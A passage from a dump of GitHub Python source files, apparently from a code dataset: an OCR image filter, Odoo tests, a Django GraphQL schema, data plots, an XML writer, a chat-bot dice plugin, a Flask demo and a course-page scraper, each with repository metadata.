Activation\nfrom otsu_thresh import otsu\nfrom projection import project\nimport cv2\nimport sys\nimport matplotlib.pyplot as plt \nimport numpy as np \nimport keras \n\nclass Filter():\n def __init__(self):\n self.model = self.get_filter()\n\n def classify(self, im):\n ft = self.get_features(im)\n ft = np.asarray(ft)\n ft = ft.reshape(1, ft.shape[0])\n pred = self.model.predict(ft)[0]\n if np.argmax(pred) == 1:\n return \"Text\"\n else:\n return \"Image\"\n\n def get_features(self, im):\n hist = cv2.calcHist([im],[0],None,[255],[0,255])\n norm_hist = hist/np.max(hist)\n var = sum(norm_hist * (np.arange(len(norm_hist)).reshape(-1, 1)))[0]\n\n if len(im.shape) > 2:\n im = otsu(im)\n projection = project(im, 0)\n num = 0 if projection[0] == 0 else 1\n for i, p in enumerate(projection):\n if p > 0 and projection[i-1] == 0:\n num += 1\n return var/1000, num\n\n def get_filter(self):\n model = Sequential()\n model.add(Dense(32, input_shape=(2,)))\n model.add(Activation('relu'))\n model.add(Dense(2))\n model.add(Activation('sigmoid'))\n model.load_weights('block_filter.h5')\n return model\n\n def filtering(self, im):\n thresh = 255 - otsu(im)\n kernel = np.ones((10,10),np.uint8)\n dilation = cv2.dilate(thresh,kernel,iterations = 1)\n _, cnts, hierachy = cv2.findContours(dilation.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n for c in cnts:\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.1 * peri, True)\n x,y,w,h = cv2.boundingRect(approx)\n if w*h > 40000:\n temp = im[y:y+h, x:x+w]\n if self.classify(temp) == \"Image\":\n im[y:y+h,x:x+w] = 255\n return im\n\nif __name__ == \"__main__\":\n f = Filter()\n im = cv2.imread(sys.argv[1])\n thresh = otsu(im)\n thresh = 255 - thresh\n\n kernel = np.ones((10,10),np.uint8)\n dilation = cv2.dilate(thresh,kernel,iterations = 1)\n # opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n # dilation = 255 - dilation\n plt.imshow(dilation, cmap='gray')\n plt.show()\n img = im.copy()\n _, cnts, hierachy = cv2.findContours(dilation.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n for c in cnts:\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.1 * peri, True)\n x,y,w,h = cv2.boundingRect(approx)\n if w*h > 40000:\n im = cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)\n # temp = img[y:y+h, x:x+w]\n # cv2.imshow(\"\", temp)\n # cv2.waitKey()\n # print f.get_features(temp)\n # if f.classify(temp) == \"Image\":\n # im[y:y+h,x:x+w] = 255\n \n plt.figure(1)\n plt.subplot(121)\n plt.imshow(img)\n plt.subplot(122)\n plt.imshow(otsu(im))\n plt.show()\n ","repo_name":"tailongnguyen/Newspaper-Optical-Character-Recognition","sub_path":"src/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28723258798","text":"from DataModel.DMBase import DMBase\r\n__author__ = 'dennis'\r\n\r\nclass ScreenGroup(DMBase):\r\n def __init__(self, id=0, name=\"\", screenOrder=0):\r\n DMBase.__init__(self)\r\n \r\n self.id = id\r\n self.name = name\r\n self.screenOrder = screenOrder\r\n \r\n def fetchOne(self, id=0, screenOrder=0):\r\n cur = self._conn.cursor()\r\n \r\n if screenOrder:\r\n cur.execute(\"select * from screen_group where screenOrder=?\", (screenOrder,))\r\n elif id:\r\n cur.execute(\"select * from screen_group where id=?\", (id,))\r\n else:\r\n return\r\n \r\n res = cur.fetchone()\r\n \r\n self.id = res[0]\r\n self.name = res[1]\r\n self.screenOrder = res[2]\r\n \r\n def fetchall(self):\r\n\r\n cur = self._conn.cursor()\r\n cur.execute(\"select * from screen_group order by screenOrder ASC\")\r\n return cur.fetchall()\r\n","repo_name":"DDecoene/OffiPOS-Stable","sub_path":"DataModel/ScreenGroup.py","file_name":"ScreenGroup.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36067824890","text":"from odoo.tests import common\nfrom odoo.tools.safe_eval import safe_eval\n\n\nclass TestPurchaseOrderInvoiceByRef(common.TransactionCase):\n\n def setUp(self):\n super().setUp()\n self.product = self.env['product.product'].create({\n 'type': 'service',\n 'company_id': False,\n 'name': 'Product test',\n 'standard_price': 10,\n })\n self.partner = self.env['res.partner'].create({\n 'name': 'Test partner',\n 'is_company': True,\n 'supplier': True,\n })\n\n def create_purchase(self, ref):\n purchase = self.env['purchase.order'].create({\n 'partner_id': self.partner.id,\n 'partner_ref': ref,\n })\n line_obj = self.env['purchase.order.line']\n line = line_obj.new({\n 'order_id': purchase.id,\n 'product_id': self.product.id,\n 'product_uom_qty': 1\n })\n line.onchange_product_id()\n line['price_unit'] = 100\n line_obj.create(line_obj._convert_to_write(line._cache))\n purchase.button_confirm()\n return purchase\n\n def test_purchase_order(self):\n refs = ['01', '*-02-*', '03...']\n purchases = self.env['purchase.order'].browse([])\n for ref in refs:\n purchases |= self.create_purchase(ref)\n self.assertEquals(len(purchases), 3)\n wizard = self.env['purchase.order.invoice_refs'].create({\n 'partner_id': self.partner.id,\n 'references': '\\n'.join(refs),\n 'method': 'all',\n 'join_purchases': True,\n })\n self.assertEquals(wizard.partner_id, self.partner)\n self.assertFalse(\n [e for e in wizard.references_to_list() if e not in refs])\n wizard.find_purchases()\n self.assertEquals(wizard.partner_id, self.partner)\n self.assertEquals(purchases, wizard.purchase_ids)\n wizard.references = '01 \\n *-02-* \\n 03...\\n \\n \\n'\n wizard.find_purchases()\n self.assertEquals(purchases, wizard.purchase_ids)\n self.assertEquals(len(wizard.line_ids), 0)\n purchase = self.create_purchase('01')\n wizard.find_purchases()\n self.assertNotEquals(purchases, wizard.purchase_ids)\n self.assertEquals(len(wizard.line_ids), 1)\n purchase.button_cancel()\n purchase.unlink()\n wizard.line_ids.unlink()\n wizard.references = '01\\n01\\n01\\n*-02-*\\n03...\\n04'\n wizard.find_purchases()\n self.assertEquals(len(wizard.references_to_list()), 6)\n self.assertEquals(purchases, wizard.purchase_ids)\n self.assertEquals(len(wizard.line_ids), 3)\n wizard.references = '01\\n*-02-*\\n03...\\n'\n wizard.action_find()\n self.assertEquals(purchases, wizard.purchase_ids)\n wizard.action_invoice()\n self.assertEquals(len(purchases[0].invoice_ids), 1)\n\n def test_purchase_order_with_taxs(self):\n tax_group_taxes = self.env.ref('account.tax_group_taxes')\n tax = self.env['account.tax'].create({\n 'name': 'Tax for purchase 10%',\n 'type_tax_use': 'purchase',\n 'tax_group_id': tax_group_taxes.id,\n 'amount_type': 'percent',\n 'amount': 10.0,\n })\n self.product.supplier_taxes_id = [(6, 0, tax.ids)]\n refs = ['01', '*-02-*', '03...']\n purchases = self.env['purchase.order'].browse([])\n for ref in refs:\n purchases |= self.create_purchase(ref)\n self.assertEquals(purchases[0].order_line.taxes_id[0], tax)\n wizard = self.env['purchase.order.invoice_refs'].create({\n 'partner_id': self.partner.id,\n 'references': '\\n'.join(refs),\n 'method': 'all',\n 'join_purchases': True,\n })\n wizard.action_find()\n self.assertEquals(purchases, wizard.purchase_ids)\n action = wizard.action_invoice()\n invoice = self.env['account.invoice'].search(\n safe_eval(action['domain']))\n self.assertEquals(len(invoice), 1)\n self.assertEquals(invoice.amount_tax, 30)\n","repo_name":"treytux/trey-addons","sub_path":"purchase_order_invoice_by_ref/tests/test_purchase_order_invoice_by_ref.py","file_name":"test_purchase_order_invoice_by_ref.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"6155909905","text":"import base64\n\nfrom django.core.files.base import ContentFile\nimport graphene\nfrom graphene_django import DjangoObjectType\nfrom graphql import GraphQLError\nfrom graphql_jwt.decorators import staff_member_required\nfrom .models import Game\nfrom graphene import relay\nfrom graphene_django.filter import DjangoFilterConnectionField\nfrom graphql_relay.node.node import unbase64\n\n\ndef format_cover_image_string(cover_image_url):\n file_format, image_string = cover_image_url.split(';base64,')\n ext = file_format.split('/')[-1]\n\n return ContentFile(base64.b64decode(image_string), name='game_cover_image.{}'.format(ext))\n\n\nclass GameType(DjangoObjectType):\n class Meta:\n model = Game\n\n\nclass GameNode(DjangoObjectType):\n class Meta:\n model = Game\n filter_fields = {\n 'name': ['iexact', 'icontains', 'istartswith'],\n 'id': ['exact']\n }\n interfaces = (relay.Node, )\n\n\nclass GameCoverImage(graphene.ObjectType):\n game_cover_image = graphene.String()\n\n\nclass AddGame(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n name = graphene.String(required=True)\n summary = graphene.String()\n parental_rating = graphene.String()\n developer = graphene.String()\n release_date = graphene.String()\n game_cover_image = graphene.String()\n\n @staff_member_required\n def mutate(self,\n info,\n name,\n summary=None,\n parental_rating=None,\n developer=None,\n release_date=None,\n game_cover_image=None):\n user = info.context.user\n\n existing_game = Game.objects.filter(name=name).first()\n if existing_game:\n raise GraphQLError(\"A game with the same name has already been added\")\n\n if release_date == '':\n release_date = None\n\n if game_cover_image == '':\n game_cover_image = None\n\n game = Game(\n name=name,\n summary=summary,\n parental_rating=parental_rating,\n developer=developer,\n release_date=release_date,\n created_by=user\n )\n\n if game_cover_image is not None:\n game.game_cover_image = format_cover_image_string(game_cover_image)\n\n game.save()\n\n return AddGame(success=True)\n\n\nclass EditGame(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n game_id = graphene.String(required=True)\n name = graphene.String(required=True)\n summary = graphene.String()\n parental_rating = graphene.String()\n developer = graphene.String()\n release_date = graphene.String()\n game_cover_image = graphene.String()\n game_cover_image_updated = graphene.Boolean()\n\n @staff_member_required\n def mutate(self,\n info,\n game_id,\n name,\n summary=None,\n parental_rating=None,\n developer=None,\n release_date=None,\n game_cover_image=None,\n game_cover_image_updated=False):\n user = info.context.user\n\n int_id = unbase64(game_id).split(':')[-1]\n existing_game = Game.objects.filter(id=int_id).first()\n if existing_game is None:\n raise GraphQLError(\"The specified game doesn't exist\")\n\n if release_date == '':\n release_date = None\n\n existing_game.name = name\n existing_game.summary = summary\n existing_game.parental_rating = parental_rating\n existing_game.developer = developer\n existing_game.release_date = release_date\n existing_game.created_by = user\n\n if game_cover_image_updated is True:\n existing_game.game_cover_image.delete()\n if game_cover_image is not None:\n existing_game.game_cover_image = format_cover_image_string(game_cover_image)\n\n existing_game.save()\n\n return EditGame(success=True)\n\n\nclass Mutation(graphene.ObjectType):\n add_game = AddGame.Field()\n edit_game = EditGame.Field()\n\n\nclass Query(graphene.ObjectType):\n game = relay.Node.Field(GameNode)\n all_games = DjangoFilterConnectionField(GameNode)\n\n game_cover_image = graphene.Field(GameCoverImage, game_cover_image_name=graphene.String())\n\n def resolve_game_cover_image(self, info, game_cover_image_name=None):\n game = Game.objects.filter(game_cover_image=game_cover_image_name).first()\n\n if game is None:\n raise GraphQLError(\"Could not find game with given search\")\n\n game_cover_image = None\n if game.game_cover_image.name is not None:\n game_cover_image = game.game_cover_image.read()\n game_cover_image = \"data:image/jpeg;base64,\" + str(base64.standard_b64encode(game_cover_image)).split(\"'\")[1]\n else:\n game_cover_image = None\n\n return GameCoverImage(\n game_cover_image=game_cover_image\n )\n","repo_name":"schmeff/pgr","sub_path":"pgr/games/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22759975182","text":"import pandas as pd\nimport scipy.stats as st\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nclass ResearchQuestionTwo:\n \"\"\"\n Runs the functions pertaining to my first research question:\n How strong is the correlation between the demographic factors\n (age, race, marital status) of the patient and the features of\n the tumors (size, grade of tumor, percent carcinogenic)?\n How big of a role do factors outside of the tumor area correlate\n to factors within the tumor area?\n \"\"\"\n\n def __init__(self):\n '''\n Sets up the dataset needed to answer the research question.\n '''\n self.df_demographics = pd.read_csv(\n 'datasets/Breast_Cancer.csv').rename(\n columns={\n 'T Stage ': 'T Stage',\n 'Reginol Node Positive': 'Regional Node Positive',\n })\n # a column that was more descriptive than just number of nodes looked\n # at or how many carcinogenic nodes were there\n self.df_demographics[\n 'Proportion of Positive Regional Nodes'] = self.df_demographics[\n 'Regional Node Positive'] / self.df_demographics[\n 'Regional Node Examined']\n self.directory = 'research_question_two_plots/'\n\n def run(self):\n '''\n Runs through plotting both the categorical & regression plots\n needed to answer the question.\n '''\n\n self.plot_categorical()\n self.plot_regression()\n\n def plot_categorical(self):\n \"\"\"\n Plots race & marital status (categorical demographic variables)\n in comparison to features of the breast tissue.\n \"\"\"\n # tumor size vs race & marital status\n for x_var in ['Race', 'Marital Status']:\n sns.barplot(data=self.df_demographics,\n x=x_var,\n y='Tumor Size',\n hue=\"T Stage\")\n # .lower.split() for consistent naming convention on plots\n plt.savefig(self.directory +\n f'tumor_size_vs_{\"_\".join(x_var.lower().split())}.png')\n plt.clf()\n\n # age vs grade of the tumor\n sns.barplot(data=self.df_demographics, x='Grade', y='Age')\n plt.savefig(self.directory + 'age_vs_grade.png')\n plt.clf()\n\n # proportion of node examined that were positive vs\n # race & marital status\n for x_var in ['Race', 'Marital Status']:\n sns.barplot(data=self.df_demographics,\n x=x_var,\n y='Proportion of Positive Regional Nodes',\n hue=\"T Stage\")\n plt.savefig(\n self.directory +\n f'prop_+_nodes_vs_{\"_\".join(x_var.lower().split())}.png')\n plt.clf()\n\n # number of survival months vs race & marital status\n for x_var in ['Race', 'Marital Status']:\n sns.barplot(data=self.df_demographics,\n x=x_var,\n y='Survival Months')\n plt.savefig(\n self.directory +\n f'survival_months_vs_{\"_\".join(x_var.lower().split())}.png')\n plt.clf()\n\n def plot_regression(self):\n \"\"\"\n Plots age (quantitative demographic variable) with other quantitative\n features to create regression plots\n \"\"\"\n # filter to just quantitative columns that uses the 'Age' column to\n # groupby to only plot the means\n df = self.df_demographics[[\n 'Age', 'Tumor Size', 'Survival Months',\n 'Proportion of Positive Regional Nodes', 'Regional Node Examined'\n ]].groupby('Age').mean()\n\n # lists are for testing\n r_values = []\n reg_plots = []\n slopes = []\n\n # plot each of these output variables in comparison to age\n for y_var in [\n 'Proportion of Positive Regional Nodes', 'Tumor Size',\n 'Regional Node Examined', 'Survival Months'\n ]:\n\n plot = sns.regplot(data=df, x=df.index, y=y_var)\n # this is the r coefficient that determines the strength of the\n # association between the two variables\n r = st.pearsonr(df.index, df[y_var])[0]\n # statistics for testing\n r_values.append(r)\n reg_plots.append(plot)\n b = st.linregress(x=plot.get_lines()[0].get_xdata(),\n y=plot.get_lines()[0].get_ydata())[0]\n slopes.append(b)\n # adding the r coefficient to the plots\n plt.text(x=0.90,\n y=0.95,\n s=\"r: {:.2f}\".format(r),\n ha='center',\n va='top',\n transform=plt.gca().transAxes)\n name = '_'.join(y_var.lower().split())\n plt.savefig(self.directory + f'{name}_vs_age.png')\n plt.clf()\n\n # return values for testing purposes\n return df, r_values, reg_plots, slopes\n","repo_name":"Chendur87/Analyzing-Physical-and-Demographic-Factors-Impacting-Breast-Cancer-Diagnosis","sub_path":"research_question_two.py","file_name":"research_question_two.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4552470778","text":"import xml.etree.ElementTree as ET\nfrom typing import List as TList\n\nfrom tasks.page import NormalText, BoldText, ListItem, Column, Row, Cell, InlineElement, Link\nfrom tasks.page import Page, Header, Paragraph, List, Table\n\n\ndef write_xmlstr(page: Page, with_page_element: bool = True) -> str:\n if page.is_empty():\n if with_page_element:\n return ''\n else:\n return ''\n\n xml_root = _XmlCreator(page).create()\n s = ET.tostring(xml_root, encoding='unicode')\n assert s.startswith('')\n assert s.endswith('')\n\n if with_page_element:\n return s\n else:\n return s[6:-7] # remove and \n\n\ndef create_xmlroot(page: Page) -> ET.Element:\n return _XmlCreator(page).create()\n\n\nclass _XmlCreator:\n\n def __init__(self, page: Page):\n self._page = page\n\n def create(self) -> ET.Element:\n xml_page = ET.fromstring('')\n for block_element in self._page.block_elements:\n self._add_xml_block_element(xml_page, block_element)\n return xml_page\n\n def _add_xml_block_element(self, xml_page, block_element):\n if isinstance(block_element, Header):\n self._add_xml_header(xml_page, block_element)\n elif isinstance(block_element, Paragraph):\n self._add_xml_paragraph(xml_page, block_element)\n elif isinstance(block_element, List):\n self._add_xml_list(xml_page, block_element)\n elif isinstance(block_element, Table):\n self._add_xml_table(xml_page, block_element)\n\n def _add_xml_header(self, xml_parent, header: Header) -> None:\n xml_header = ET.SubElement(xml_parent, 'header', level=str(header.level))\n self._add_xml_inline_elements(xml_header, header.inline_elements)\n\n def _add_xml_paragraph(self, xml_parent, paragraph: Paragraph) -> None:\n if paragraph.preformatted:\n xml_para = ET.SubElement(xml_parent, 'paragraph', preformatted='true')\n else:\n xml_para = ET.SubElement(xml_parent, 'paragraph')\n self._add_xml_inline_elements(xml_para, paragraph.inline_elements)\n\n def _add_xml_list(self, xml_parent, list_: List) -> None:\n xml_list = ET.SubElement(xml_parent, 'list')\n for list_item in list_.items:\n self._add_xml_listitem(xml_list, list_item)\n\n def _add_xml_listitem(self, xml_parent, list_item: ListItem) -> None:\n if list_item.preformatted:\n xml_list_item = ET.SubElement(xml_parent, 'item', symbol=list_item.symbol, preformatted='true')\n else:\n xml_list_item = ET.SubElement(xml_parent, 'item', symbol=list_item.symbol)\n\n self._add_xml_inline_elements(xml_list_item, list_item.inline_elements)\n for sub_item in list_item.sub_items:\n self._add_xml_listitem(xml_list_item, sub_item)\n\n def _add_xml_table(self, xml_parent, table: Table) -> None:\n xml_table = ET.SubElement(xml_parent, 'table')\n for col in table.columns:\n self._add_xml_column(xml_table, col)\n for row in table.rows:\n self._add_xml_row(xml_table, row)\n\n @staticmethod\n def _add_xml_column(xml_parent, column: Column) -> None:\n xml_col = ET.SubElement(xml_parent, 'column', halign=str(column.halign.name))\n xml_col.text = column.text\n\n def _add_xml_row(self, xml_parent, row: Row) -> None:\n xml_row = ET.SubElement(xml_parent, 'row')\n for cell in row.cells:\n self._add_xml_cell(xml_row, cell)\n\n def _add_xml_cell(self, xml_parent, cell: Cell) -> None:\n xml_cell = ET.SubElement(xml_parent, 'cell')\n self._add_xml_inline_elements(xml_cell, cell.inline_elements)\n\n def _add_xml_inline_elements(self, xml_block_element, inline_elements: TList[InlineElement]) -> None:\n xml_block_element.text = ''\n if len(inline_elements) == 0:\n return\n\n start_index = 0\n inline_element0 = inline_elements[0]\n if isinstance(inline_element0, NormalText):\n xml_block_element.text = inline_element0.text\n start_index = 1\n\n k = start_index\n while k < len(inline_elements):\n inline_element = inline_elements[k]\n xml_inline_element = self._add_xml_inline_element(xml_block_element, inline_element)\n if k + 1 < len(inline_elements):\n next_inline_element = inline_elements[k+1]\n if isinstance(next_inline_element, NormalText):\n xml_inline_element.tail = next_inline_element.text\n k += 1\n k += 1\n\n def _add_xml_inline_element(self, xml_block_element, inline_element: InlineElement) -> ET.SubElement:\n if isinstance(inline_element, BoldText):\n return self._add_xml_bold(xml_block_element, inline_element)\n elif isinstance(inline_element, Link):\n return self._add_xml_link(xml_block_element, inline_element)\n\n @staticmethod\n def _add_xml_bold(xml_parent, bold_text: BoldText) -> ET.SubElement:\n xml_bold = ET.SubElement(xml_parent, 'bold')\n xml_bold.text = bold_text.text\n return xml_bold\n\n @staticmethod\n def _add_xml_link(xml_parent, link: Link) -> ET.SubElement:\n xml_link = ET.SubElement(xml_parent, 'link', uri=link.uri)\n if link.text:\n xml_link.text = link.text\n return xml_link\n","repo_name":"czeppi/cc-pim","sub_path":"src/tasks/xml_writing.py","file_name":"xml_writing.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11209195956","text":"from jieba import posseg\nfrom nonebot import (CommandSession, IntentCommand, NLPSession, on_command,\n on_natural_language)\nfrom nonebot.permission import *\n\nfrom utils_bot.typing import Callable, Generator, Union\n\nfrom .diceroll import *\n\n__plugin_name__ = '试试人品 *NL'\n__plugin_usage__ = f'''feature: 生成随机数\n可用命令:\n扔骰子, 扔骰子 []次\n扔硬币, 扔硬币 []次\n'''\n\n# help session\n@on_command('试试人品', permission=GROUP_MEMBER | SUPERUSER)\nasync def try_luck(session: CommandSession):\n await session.send(__plugin_usage__)\n\nclass random_ops:\n @staticmethod\n async def evaluate(session: CommandSession, f: Callable):\n times: int = session.get('times')\n await session.send(f(**( {'times': times} if times else {} )))\n \n @staticmethod\n def nl_proc(session: NLPSession) -> Generator[Union[str, None], None, None]:\n argsStripped: str = session.msg_text.strip()\n words = posseg.lcut(argsStripped)\n\n for word in words:\n if word.flag == 'm':\n yield word.word\n yield None\n\n@on_command('扔骰子', aliases=('扔色子', '扔个骰子', '扔个色子'), permission=GROUP_MEMBER | SUPERUSER)\nasync def roll_dice_host(session: CommandSession):\n await random_ops.evaluate(session, roll_dice_many)\n\n\n@on_command('扔硬币', aliases=('扔个硬币', '扔钢镚', '扔个钢蹦'), permission=GROUP_MEMBER | SUPERUSER)\nasync def flip_coin_host(session: CommandSession):\n await random_ops.evaluate(session, flip_coin_many)\n\n\n\n@roll_dice_host.args_parser\n@flip_coin_host.args_parser\nasync def _(session: CommandSession):\n argsStripped: str = session.current_arg_text.strip(' \\n次')\n session.state['times'] = argsStripped if argsStripped else None\n\n\n# EXP\n@on_natural_language(keywords={'骰子', '色子'}, permission=SUPERUSER | GROUP_MEMBER)\nasync def _(session: NLPSession):\n times = next(random_ops.nl_proc(session))\n return IntentCommand(64.0, '扔骰子', current_arg=times or '')\n\n@on_natural_language(keywords={'硬币', '钢镚'}, permission=SUPERUSER | GROUP_MEMBER)\nasync def _(session: NLPSession):\n times = next(random_ops.nl_proc(session))\n return IntentCommand(64.0, '扔硬币', current_arg=times or '')\n","repo_name":"cleoold/sendo-erika","sub_path":"plugins/gamble/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"15345980111","text":"# Flask などの必要なライブラリをインポートする\nfrom flask import Flask, render_template, request, redirect, url_for, make_response\nimport numpy as np\n\n# 自身の名称を app という名前でインスタンス化する\napp = Flask(__name__)\n\n# メッセージをランダムに表示するメソッド\ndef picked_up():\n messages = [\n \"こんにちは、あなたの名前を入力してください\",\n \"やあ!お名前は何ですか?\",\n \"あなたの名前を教えてね\"\n ]\n # NumPy の random.choice で配列からランダムに取り出し\n return np.random.choice(messages)\n\n# ここからウェブアプリケーション用のルーティングを記述\n# index にアクセスしたときの処理\n@app.route('/')\ndef index():\n title = \"ようこそ\"\n message = picked_up()\n # index.html をレンダリングする\n return render_template('index.html',\n message=message, title=title)\n\n# /post にアクセスしたときの処理\n@app.route('/post', methods=['GET', 'POST'])\ndef post():\n title = \"こんにちは\"\n if request.method == 'POST':\n # リクエストフォームから「名前」を取得して\n name = request.form['name']\n # index.html をレンダリングする\n return render_template('index.html',\n name=name, title=title)\n else:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('index'))\n\n\n@app.route('/graph1')\ndef graph1():\n import matplotlib.pyplot\n from matplotlib.backends.backend_agg import FigureCanvasAgg\n import io as cStringIO\n # from io import StringIO\n import random\n\n fig, ax = matplotlib.pyplot.subplots()\n ax.set_title(u'IMINASHI GRAPH')\n x_ax = range(1, 284)\n y_ax = [x * random.randint(436, 875) for x in x_ax]\n ax.plot(x_ax, y_ax)\n\n canvas = FigureCanvasAgg(fig)\n buf = cStringIO.StringIO()\n canvas.print_png(buf)\n data = buf.getvalue()\n\n response = make_response(data)\n response.headers['Content-Type'] = 'image/png'\n response.headers['Content-Length'] = len(data)\n return response\n\n\nif __name__ == '__main__':\n app.debug = True # デバッグモード有効化\n app.run(host='0.0.0.0') # どこからでもアクセス可能に\n","repo_name":"yukimori/misc","sub_path":"flask/basic/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10291548186","text":"# coding=utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport psycopg2\nfrom config import config\nimport re\nfrom orm import Persistent\nfrom hashlib import md5\nimport asyncio\nfrom aiohttp import ClientSession, ClientTimeout, ClientConnectorError\n\ntimeoutSettings = ClientTimeout(total=5)\n\nasync def fetch(*args, **kwargs):\n sleep_time = 30\n while True:\n async with sem:\n try:\n print(kwargs[\"url\"][:80])\n\n if \"data\" in kwargs:\n print(str(kwargs[\"data\"])[:80])\n elif \"params\" in kwargs:\n print(str(kwargs[\"params\"])[:80])\n\n async with ClientSession(timeout=timeoutSettings) as session:\n async with session.request(*args, **kwargs) as page:\n if page.status == 404:\n return None\n elif page.status >= 500:\n continue\n elif page.status != 200:\n continue\n else:\n return await page.text()\n except ClientConnectorError:\n print(\"\\nEXCEPTION\\n\")\n continue\n except asyncio.TimeoutError:\n print(\"TIMEOUT, SLEEPING {}s...\".format(sleep_time))\n await asyncio.sleep(sleep_time)\n sleep_time += 30\n continue\n\n\n\nasync def scrap_plan(conn, degree_code, subject_code=None, year=None):\n pla_docent_url = \"http://www.ub.edu/grad/plae/AccesInformePD\"\n get_params = {\n \"curs\": year,\n \"idioma\": \"CAT\",\n \"codiGiga\": subject_code,\n \"recurs\": \"publicacio\"\n }\n\n try:\n pla_docent_text = await fetch(url=pla_docent_url, method=\"GET\", params=get_params)\n except ClientConnectorError:\n print(\"\\nException @scrap_plan!\")\n print(degree_code)\n print(pla_docent_url)\n print(str(get_params))\n print()\n return\n\n year_alias = str(year) + \"-\" + str(year + 1)\n Persistent(conn, \"subject_year\", pkey=[\"subject_code\", \"year\"],\n subject_code=subject_code,\n year=year,\n year_alias=year_alias,\n pla_docent=pla_docent_text)\n\n if pla_docent_text is None: return\n\n pla_docent_soup = BeautifulSoup(pla_docent_text, \"html.parser\")\n\n competencies = pla_docent_soup.find_all(\"table\", class_=\"taulaCompetencies\")\n\n for table in competencies:\n for tag in table.find_all(\"span\"):\n if tag.string is not None:\n matching = re.match(\"([^.]{1,45})\\s*\\.\\s*(.+)\", tag.string.strip())\n try:\n comp_id, comp_desc = matching.groups()\n except AttributeError:\n comp_desc = tag.string\n comp_id = md5(comp_desc.encode(\"utf-8\")).hexdigest()\n\n Persistent(conn, \"competence\", pkey=[\"id\"], id=comp_id, description=comp_desc)\n Persistent(conn, \"subject_competence\", subject_code=subject_code, competence_id=comp_id)\n\n\n# http://www.ub.edu/grad/plae/AccesInformePD?curs=2018&codiGiga=364292&idioma=CAT&recurs=publicacio\nasync def fetch_professor(conn, degree_code, year, professor_code):\n directori_url = \"http://www.ub.edu/grad/infes/fitxaInfe.jsp\"\n post_params = {\n \"n0\": \"P2L\",\n \"n1\": \"000\",\n \"n2\": 1,\n \"curs\": year,\n \"ens\": degree_code,\n \"prof\": professor_code\n }\n\n try:\n directori_text = await fetch(url=directori_url, method=\"POST\", data=post_params)\n if directori_text is None: return\n except ClientConnectorError:\n print(\"\\nProfessor exception!\\n\")\n return\n\n dsoup = BeautifulSoup(directori_text, \"html.parser\")\n\n name = dsoup.select_one(\"td.titol_paginaPDI\")\n email = dsoup.select_one(\"a[href^=mailto]\")\n department = dsoup.select_one(\"td.titoltext3\")\n\n if name is None:\n return\n else:\n name = name.text.strip()\n name = re.sub(\"(^[.,]|[.,]$)\", \"\", name).strip()\n name = re.sub(\"\\s+\", \" \", name).title()\n\n if email is not None: email = email.text.strip()\n if department is not None: department = department.text.strip()\n\n return Persistent(conn, \"professor\",\n pkey=[\"name\"],\n update=True,\n name=name,\n department=department,\n email=email).result[\"code\"]\n\n\nasync def scrap_schedule(conn, degree_code, subject_code, year, semester):\n semester = str(semester)\n horaris_url = \"http://www.ub.edu/grad/infes/fitxaInfe.jsp\"\n post_params = {\n \"curs\": year,\n \"ens\": degree_code,\n \"assig\": subject_code,\n \"n0\": \"2L\",\n \"n1\": \"00\",\n \"n2\": \"1\",\n \"cicle\": \"g\",\n \"cursImp\": \"null\",\n \"grup\": \"null\",\n \"semImp\": \"null\",\n \"semIni\": semester,\n \"prof\": \"\",\n \"tipus\": \"FB\",\n \"ta\": \"null\",\n \"target\": \"_parent\"\n }\n\n try:\n horaris_text = await fetch(url=horaris_url, method=\"POST\", data=post_params)\n if horaris_text is None: return\n except ClientConnectorError:\n print(\"\\nSchedule exception!\\n\")\n return\n\n horaris_soup = BeautifulSoup(horaris_text, \"html.parser\")\n\n for group in horaris_soup.find_all(\"div\", class_=\"faGrup\"):\n group_table = group.find(\"table\", class_=\"faPlanifGrup\")\n if group_table is None: # skip headers & the like\n continue\n\n faDDGrup = group_table.find(\"td\", class_=\"faDDGrup\")\n schedule = group_table.find(\"table\", class_=\"idh\")\n profs = group_table.find(\"td\", class_=\"cPlanif_Prof_M1\")\n room = group_table.find(\"td\", class_=\"cPlanif_Local_M1\")\n language = group_table.find(\"td\", class_=\"faDDIdioma\")\n\n # Clean nullable columns\n if schedule is not None: schedule = str(schedule)\n if room is not None: room = room.text.strip()\n if language is not None: language = language.text.strip()\n\n # Clean variables\n class_group_id = None\n professor_code = None\n\n if faDDGrup is not None:\n class_group_id = Persistent(conn, \"class_group\",\n pkey=[\"subject_code\", \"year\", \"semester\", \"group\"],\n subject_code=subject_code,\n year=year,\n semester=semester,\n group=faDDGrup.text.strip(),\n schedule=schedule,\n room=room,\n 